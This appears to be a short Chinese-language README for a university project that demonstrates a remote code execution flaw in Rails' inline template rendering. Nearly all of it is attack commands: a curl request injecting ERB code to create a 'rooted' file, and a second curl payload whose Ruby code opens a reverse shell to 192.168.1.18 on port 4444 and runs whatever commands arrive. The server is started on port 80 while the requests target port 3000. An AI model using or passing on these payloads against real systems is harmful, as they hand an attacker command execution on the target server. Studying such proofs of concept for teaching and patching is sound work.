由 @alejandro-marting 创建的大学项目, 我们可以在其中检查漏洞2096
使用:
首先我们需要使用以下命令运行 Rails 服务器:
$ rvmsudo rails server -b 0.0.0.0 -p 80
现在我们可以通过以下命令触发远程代码执行:
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(应该会生成一个 rooted 文件)
如果你想尝试通过 Ruby 代码注入实现反向 shell,可以运行以下命令:
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
如有任何问题,请与我联系!